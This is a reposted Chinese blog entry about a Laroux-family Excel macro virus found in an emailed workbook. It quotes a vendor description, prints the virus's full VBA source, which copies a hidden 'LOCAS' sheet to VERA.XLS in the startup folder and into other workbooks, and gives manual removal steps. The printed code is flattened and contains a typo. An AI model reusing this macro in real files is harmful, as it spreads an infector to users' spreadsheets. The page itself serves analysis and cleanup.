Virus.MSExcel.Laroux病毒 病毒virus viral.2016

发布时间:2018年04月10日 20:46:41分享人:梦境来源:互联网6

学院发来的电子邮件里,Excel文件被卡巴提示有Virus.MSExcel.Laroux-based病毒。金山和360没反应。以下是趋势上的病毒描述:
Arrival Details
This malware arrives via the following means:
Opening Microsoft Excel workbook files infected with thismalwareInstallation
This file infector drops the following copies of itself intothe affected system:
%User Profile%ApplicationDataMicrosoftExcelXLSTARTStartUp.xls(Note: %User Profile% is the current user's profile folder,which is usually C:WindowsProfiles{user name} on Windows 98 andME, C:WINNTProfiles{user name} on Windows NT, and C:Documentsand Settings{user name} on Windows 2000, XP, and Server2003.)
File Infection
This file infector infects the following file types:
Microsoft Office Excel Workbook (*.xls)
是个Excel的宏病毒。用Alt+F11打开带毒文件的宏,浏览了一下宏的代码。Sub auto_open() Application.OnSheetActivate = "check_files"End Sub
Virus.MSExcel.Laroux病毒 病毒virus viral.2016
Sub check_files() c$ =Application.StartupPath m$ = Dir(c$ & ""& "VERA.XLS") If m$ = "VERA.XLS" Thenp = 1 Else p = 0 IfActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w *10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ =ActiveWorkbook.Name Sheets("locas").Visible= True Sheets("locas").Select Sheets("locas").Copy WithActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ =ActiveWorkbook.Name c4$ = CurDir() ChDirApplication.StartupPath ActiveWindow.Visible =False Workbooks(newname$).SaveAs FileName:=Application.StartupPath &"/" & "VERA.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="",ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("LOCAS").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "VERA.xls!check_files" Case 1 Application.ScreenUpdating = False n4$ =ActiveWorkbook.Name p4$ =ActiveWorkbook.Path s$ =Workbooks(n4$).Sheets(1).Name If s$ <> "LOCAS"Then Workbooks("VERA.XLS").Sheets("LOCAS").Copybefore:=Workbooks(n4$).Sheets(1) Workbooks(n4$).Sheets("LOCAS").Visible = False Else End If Application.OnSheetActivate = "" Application.ScreenUpdating = Tru Application.OnSheetActivate = "VERA.xls!check_files" Case ElseEnd SelectEnd Sub

从源代码看,这个病毒的破坏行不大,就是在excel的StartupPath里写个文件。不过变种会比较多,我收到的这个就是把Startup.xls改为VERA.xls了。
清除的方法,就手工清一下好了。1. 找到MicrosoftExcelXLSTART;不同的windows版本,文件名略有不同。将该文件夹中的可疑的EXCEL文件都删除2.打开Excel,设置宏的安全级别为最高3.打开被提示有病毒的Excel文档,按下Alt+F11键,删除宏。

  
zika virus 寨卡病毒 

爱华网本文地址 » http://www.aihuau.com/a/25101012/112335.html

更多阅读

什么是大三阳小三阳 刘德华乙肝病毒携带者

什么是大三阳小三阳——简介“大三阳”和“小三阳”是指在进行“乙肝肝炎抗原二对半”体检时的二种不同结果。大小三阳都是反映体内乙肝病毒数量和活跃程度的一个数据,只是反映人体内携带病毒的状况,都不能反映肝脏功能的正常与否,因而

乙肝病毒携带者能生孩子吗 乙肝病毒携带者的症状

  乙肝病毒携带者是指感染了乙肝病毒,没有乙肝明显的症状表现和体征等,肝功能等检查也是正常的,虽然是乙肝病毒携带者,但是也是有传染性的,那么乙肝病毒携带者能生孩子吗?  专家指出,乙肝病毒携带者怀孕生孩子是要看患者自身的情况,生

手机被感染病毒后如何处理 苹果手机会感染病毒吗

手机被感染病毒后如何处理——简介预装机病毒也成为手机病毒的一种新兴产物,这类手机病毒会通过手机预装软件提前安装到我们的手机中,会导致用户手机死机、关机、个人资料被删、向外发送垃圾邮件泄露个人信息、自动拨打电话等进行恶意

手机中病毒的危害和如何清理 手机病毒怎么清理

手机中病毒的危害和如何清理——简介 对于手机中病毒的用户来说一定要及时的清理,否则会对我们的手机和个人信息及财产造成威胁。手机病毒都具备相应的传染性和破坏性,机上网支付等功能也呈现更为全面的趋势。那么,手机中毒后不能及时

手机存储卡病毒 手机存储卡哪个牌子好

手机太”聪明”会惹祸GPRS、蓝牙、摄像头、MP4……现在手机的功能越来越多、越来越“聪明”,能帮人做很多事。但烦恼也随之而来,一方面高端智能手机功能烦琐、容易误操作,另一方面活跃在计算机上的黑客们也盯上了这片“沃土”,手机

声明:《Virus.MSExcel.Laroux病毒 病毒virus viral.2016》为网友梦境分享!如侵犯到您的合法权益请联系我们删除